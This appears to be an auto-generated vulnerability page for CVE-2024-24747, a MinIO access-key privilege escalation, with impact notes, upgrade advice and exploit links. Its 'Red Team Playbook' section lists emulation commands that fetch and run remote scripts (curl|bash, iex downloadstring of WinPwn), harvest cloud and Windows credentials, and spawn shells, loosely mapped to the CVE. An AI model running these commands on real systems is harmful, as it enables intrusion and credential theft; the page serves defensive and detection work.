CVE-2024-24747
Overview
This vulnerability is an authorization bypass stemming from improper inheritance of permissions in MinIO's access key hierarchy. When an access key is created, it inherits not only the intended 's3:*' permissions but also 'admin:*' permissions from its parent key unless explicitly denied. This flawed permission inheritance mechanism affects MinIO's access key management component, allowing escalation of privileges within the access control framework.
Vulnerability Description
MinIO is a High Performance Object Storage. When someone creates an access key, it inherits the permissions of the parent key. Not only for `s3:*` actions, but also `admin:*` actions. Which means unless somewhere above in the access-key hierarchy, the `admin` rights are denied, access keys will be able to simply override their own `s3` permissions to something more permissive. The vulnerability is fixed in RELEASE.2024-01-31T20-20-33Z.
Impact
An attacker with access to a parent access key possessing elevated privileges can create subordinate keys that inherit admin-level permissions, enabling unauthorized administrative actions. This requires authenticated access with at least limited privileges (PR:L) and network access (AV:N). Exploitation can lead to full compromise of object storage controls, including data manipulation and administrative configuration changes, as indicated by the CVSS vector (C:H/I:H/A:H). This elevates the risk of data breaches and service disruption within affected MinIO deployments.
Solution
Users should upgrade MinIO to version RELEASE.2024-01-31T20-20-33Z or later, which contains the fix for this permission inheritance vulnerability. Detailed patch instructions and advisory information are available in the MinIO GitHub security advisory GHSA-xx8w-mq23-29g4 and the release notes at https://github.com/minio/minio/releases/tag/RELEASE.2024-01-31T20-20-33Z. No alternative workarounds are documented; applying the update is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in MinIO, a high-performance object storage solution, arises from the way access keys are managed within its permission hierarchy. When a new access key is created, it inherits the permissions of its parent key, including both `s3:` and `admin:` actions. This design flaw allows users with newly created access keys to potentially escalate their privileges by overriding their own `s3` permissions, unless explicitly denied by a higher-level key in the hierarchy. The implications of this vulnerability are significant, as it can lead to unauthorized access and manipulation of sensitive data, as well as administrative capabilities that could compromise the integrity and security of the entire storage system.
Attack vectors for exploiting this vulnerability are varied and can be executed by both internal and external actors. An attacker with access to a lower-level key could create a new key that inherits broader permissions, effectively granting them the ability to perform administrative actions. For instance, an attacker could escalate their privileges to delete critical data, modify access controls, or even exfiltrate sensitive information. Additionally, if an organization has not implemented strict controls on key creation and management, the risk of exploitation increases, as malicious actors could easily manipulate the access hierarchy to their advantage. The ease of privilege escalation through this vulnerability makes it particularly dangerous in environments where access keys are widely distributed or poorly monitored.
The real-world impact of this vulnerability can be profound, especially for organizations that rely on MinIO for critical data storage and management. The ability to gain unauthorized administrative access could lead to significant business risks, including data breaches, loss of customer trust, and potential regulatory penalties. Organizations may face operational disruptions if critical data is deleted or altered, and the financial implications of such incidents can be severe. Furthermore, the reputational damage from a security breach can have long-lasting effects on an organization’s standing in the market, making it essential for businesses to prioritize the security of their storage solutions.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, regular audits of access keys and their permissions should be conducted to identify any keys that may have excessive privileges. Implementing a principle of least privilege can help ensure that users only have the necessary permissions for their roles, minimizing the risk of privilege escalation. Additionally, organizations should consider employing monitoring solutions that can alert administrators to unusual access patterns or key creation activities. Updating to the fixed version of MinIO is crucial, as it addresses the underlying issue and prevents the inheritance of excessive permissions in newly created access keys.
In conclusion, the vulnerability in MinIO related to access key permission inheritance poses a significant threat to organizations that utilize this object storage solution. The potential for privilege escalation and unauthorized access can lead to severe consequences, including data breaches and operational disruptions. By implementing robust detection and mitigation strategies, organizations can safeguard their data and maintain the integrity of their storage systems. It is imperative for businesses to remain vigilant and proactive in addressing such vulnerabilities to protect against evolving cyber threats.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Minio | Minio | 2024-01-31t20-20-33z |
cpe:2.3:a:minio:minio:2024-01-31t20-20-33z:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| MinIO < 2024-01-31T20-20-33Z - Privilege Escalation | Jenson Zhao | remote | go | - | View |
Threat Feed
1 eventsPublic exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-122 | Privilege Abuse |
30%
|
High | Medium | |
| CAPEC-233 | Privilege Escalation |
30%
|
— | — | |
| CAPEC-58 | Restful Privilege Elevation |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-24747 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/minio/minio/security/advisories/GHSA-xx8w-mq23-29g4 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/minio/minio/commit/0ae4915a9391ef4b3ec80f5fcdcf24ee6884e776 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/minio/minio/releases/tag/RELEASE.2024-01-31T20-20-33Z |